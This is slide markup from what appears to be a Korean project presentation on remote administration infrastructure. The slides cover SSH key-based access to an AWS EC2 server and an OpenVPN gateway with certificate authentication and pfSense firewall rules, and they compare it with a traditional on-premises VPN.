          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9466298" y="-895168"/>
            <a:ext cx="45719" cy="4803714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6" name="Shape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7289804" y="1665512"/>
            <a:ext cx="242767" cy="247802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8" name="Text 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7666842" y="1702555"/>
            <a:ext cx="1979065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SSH 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키 기반 원격 접속 검증</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Text 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7304739" y="2016846"/>
            <a:ext cx="4370041" cy="66539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en-US" altLang="ko-KR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EC2 </a:t>
            </a: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인스턴스에 생성 시 발급된 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0" err="1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프라이빗</a:t>
            </a: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키</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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(.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1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pem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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) </a:t>
            </a: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를 이용해 원격 접속을 수행</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="94A3B8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해당 방식은 인스턴스 키를 소유한 사용자만 접속이 가능하며</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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,IP </a:t>
            </a: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위치나 네트워크 환경에 제한 없이 안전한 원격 접속이 가능함을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Shape 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7065802" y="3081487"/>
            <a:ext cx="4825213" cy="1541099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" name="Text 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7645344" y="3294018"/>
            <a:ext cx="1979065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보안 관점 접근 제어</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7255307" y="3294018"/>
            <a:ext cx="239055" cy="247802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2" name="Text 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7266530" y="3637205"/>
            <a:ext cx="4461098" cy="85314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en-US" altLang="ko-KR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SSH </a:t>
            </a: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접속 시 비밀번호 인증을 사용하지 않고 키 기반 인증을 적용함으로써 무차별 대입 공격</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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(Brute Force) </a:t>
            </a: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및 계정 탈취 위험을 최소화</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="94A3B8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또한 보안 그룹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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(Security Group)</a:t>
            </a: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을 통해 필요한 포트만 외부에 개방하여 접근 범위를 제한</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Shape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9455549" y="708406"/>
            <a:ext cx="45719" cy="4825213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08867" y="1427524"/>
            <a:ext cx="6295827" cy="5008836"/>
            <a:chOff x="371246" y="1537106"/>
            <a:chExt cx="7582205" cy="4949647"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12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21" name="그림 20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rcRect l="260" t="400" r="1070" b="1200"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="587443" y="1503680"/>
            <a:ext cx="6155318" cy="4875997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="381305"/>
            <a:ext cx="761695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9" name="Shape 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7085587" y="4884673"/>
            <a:ext cx="4825213" cy="1541099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" name="Text 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7665129" y="5097204"/>
            <a:ext cx="1979065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운영 및 관리 측면 검증</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Shape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7275092" y="5097204"/>
            <a:ext cx="239055" cy="247802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2" name="Text 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7286315" y="5440391"/>
            <a:ext cx="4461098" cy="85314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외부에서의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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SSH </a:t>
            </a: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접속을 통해 서버 상태 확인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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프로세스 관리</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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서비스 운영이 가능함을 검증</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="94A3B8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이는 클라우드 서버가 물리적 위치와 무관하게 원격 운영 인프라로 활용 가능함을 의미하며</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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9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보안 키 관리만 적절히 수행할 경우 안정적인 서버 운영이 가능함을 보여줌</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Image 0" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="-80" r="-80"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7319867" y="5156722"/>
            <a:ext cx="156922" cy="125337"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Shape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9475334" y="2511592"/>
            <a:ext cx="45719" cy="4825213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4" name="Image 1" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix amt="80000"/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7344436" y="1709464"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Image 5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304739" y="3344038"/>
            <a:ext cx="157173" cy="15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8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571500" y="838505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 VPN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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개요</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1257300"/>
            <a:ext cx="571500" cy="3840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571500" y="1755647"/>
            <a:ext cx="5333695" cy="1117703"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5333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0392" y="1909764"/>
            <a:ext cx="228600" cy="228600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310335" y="2161336"/>
            <a:ext cx="4500677" cy="4389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서버를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EC2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상에 배치하여 물리 장비 장애와 무관한 안정적인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접속 환경을 제공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인터넷 회선 기반 터널링으로 네트워크 장애 발생 시에도 신속한 복구 가능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중앙 집중형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게이트웨이를 통해 접속 상태 및 세션 관리 용이</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="2987491"/>
            <a:ext cx="5333695" cy="991514"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5333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 rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="-80" r="-80"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="800100" y="3103924"/>
            <a:ext cx="286207" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1266444" y="3385560"/>
            <a:ext cx="4548226" cy="4389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인증서 기반 접속 제어를 통해 허가된 관리자만 내부망 접근 가능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터널 내에서 방화벽 정책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(pfSense)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과 연동하여 서비스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/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포트 단위 접근 제어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관리 트래픽과 일반 사용자 트래픽을 논리적으로 분리하여 보안 수준 강화</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565201" y="4096928"/>
            <a:ext cx="5333695" cy="1009067"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5333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 rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="-60" r="-60"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="836778" y="4228748"/>
            <a:ext cx="200254" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1261974" y="4525623"/>
            <a:ext cx="4539082" cy="4389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 Client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추가 시 별도 물리 장비 없이 인증서 발급만으로 확장 가능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인프라 특성상 서버 스펙 조정 및 추가 인스턴스 확장이 용이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지점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·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원격 관리자 증가 시에도 동일한 보안 정책을 일관되게 적용 가능</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Shape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286500" y="1752905"/>
            <a:ext cx="5333695" cy="4478731"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 262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 rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect t="-180" b="-180"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6581394" y="1985659"/>
            <a:ext cx="190195" cy="152705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Shape 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6524244" y="4858789"/>
            <a:ext cx="4858207" cy="1213981"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4738"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/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6" name="Image 4" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7"/>
          <a:srcRect t="-100" b="-100"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6662776" y="5012299"/>
            <a:ext cx="114300" cy="152155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Text 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6915607" y="5009066"/>
            <a:ext cx="4405579" cy="3017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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="10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선택 이유</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Text 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6915607" y="5264843"/>
            <a:ext cx="4391863" cy="66347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IPSec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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대비 구성 단순성 및 디버깅 용이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NAT/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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방화벽 환경에서도 안정적인 연결</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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다양한 암호화 알고리즘 지원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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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와의 높은 호환성</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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클라우드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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·</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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온프레미스 혼합 환경에 최적화</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Text 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="323698"/>
            <a:ext cx="3801161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 VPN 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개요</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Text 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1310335" y="1862672"/>
            <a:ext cx="4160825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안정적인 원격 접속 통로 확보 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="15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(VPN Availability)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Text 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1266444" y="3071006"/>
            <a:ext cx="3048610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관리 트래픽 전용 접근 제어 구조</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Text 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1261974" y="4211069"/>
            <a:ext cx="3110687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관리 접속 확장에 유연한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="15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15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구조</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Text 36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6980987" y="1950585"/>
            <a:ext cx="2153412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구성 방식 </a:t>
            </a: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비교</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="77" name="그룹 76"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6520587" y="2326081"/>
            <a:ext cx="4860036" cy="2393556"/>
            <a:chOff x="6520587" y="2326081"/>
            <a:chExt cx="4860036" cy="2899336"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Shape 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6520587" y="2326081"/>
              <a:ext cx="1218895" cy="437998"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0F172A">
                <a:alpha val="8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Shape 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7735825" y="2326081"/>
              <a:ext cx="1800454" cy="437998"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0F172A">
                <a:alpha val="8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Shape 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9532621" y="2326081"/>
              <a:ext cx="1848002" cy="437998"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0F172A">
                <a:alpha val="8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4" name="Text 37"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6955841" y="2440381"/>
              <a:ext cx="348386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 b="1">
                  <a:solidFill>
                    <a:srgbClr val="22D3EE"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                  <a:cs typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>구분</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="Text 38"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7851953" y="2440381"/>
              <a:ext cx="1567282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ko-KR" altLang="en-US" sz="1000" b="1">
                  <a:solidFill>
                    <a:srgbClr val="22D3EE"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                  <a:cs typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>전통적 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1">
                  <a:solidFill>
                    <a:srgbClr val="22D3EE"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                  <a:cs typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>VPN (On-Prem)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Text 39"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9849207" y="2438552"/>
              <a:ext cx="1363167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 b="1">
                  <a:solidFill>
                    <a:srgbClr val="22D3EE"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                  <a:cs typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>OpenVPN </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1">
                  <a:solidFill>
                    <a:srgbClr val="22D3EE"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                  <a:cs typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>기반 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1">
                  <a:solidFill>
                    <a:srgbClr val="22D3EE"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                  <a:cs typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>Hybrid</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Shape 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6520587" y="2744876"/>
              <a:ext cx="1218895" cy="15390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Shape 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7735825" y="2744876"/>
              <a:ext cx="1800454" cy="15390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Shape 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9532621" y="2744876"/>
              <a:ext cx="1848002" cy="15390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Shape 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6520587" y="2760266"/>
              <a:ext cx="1218895" cy="496149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Shape 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6520587" y="3249087"/>
              <a:ext cx="1218895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Shape 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7735825" y="3249087"/>
              <a:ext cx="1800454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Shape 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9532621" y="3249087"/>
              <a:ext cx="1848002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Shape 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6520587" y="3256415"/>
              <a:ext cx="1218895" cy="496149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Shape 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6520587" y="3745236"/>
              <a:ext cx="1218895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Shape 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7735825" y="3745236"/>
              <a:ext cx="1800454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Shape 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9532621" y="3745236"/>
              <a:ext cx="1848002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Shape 24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6520587" y="3752564"/>
              <a:ext cx="1218895" cy="496149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Shape 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6520587" y="4241385"/>
              <a:ext cx="1218895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Shape 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7735825" y="4241385"/>
              <a:ext cx="1800454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Shape 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9532621" y="4241385"/>
              <a:ext cx="1848002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Shape 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6520587" y="4249446"/>
              <a:ext cx="1218895" cy="488821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7" name="Text 40"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6749187" y="2928092"/>
              <a:ext cx="633679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000" b="1">
                  <a:solidFill>
                    <a:srgbClr val="CBD5E1"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>VPN</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1">
                  <a:solidFill>
                    <a:srgbClr val="CBD5E1"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t> 위치</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="Text 41"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7800747" y="2928092"/>
              <a:ext cx="1672438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ko-KR" alt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사내 방화벽</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" alt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장비</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="Text 43"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9794139" y="2928092"/>
              <a:ext cx="1329538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AWS EC2 (Cloud)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="Text 45"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6749187" y="3424974"/>
              <a:ext cx="758038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000" b="1">
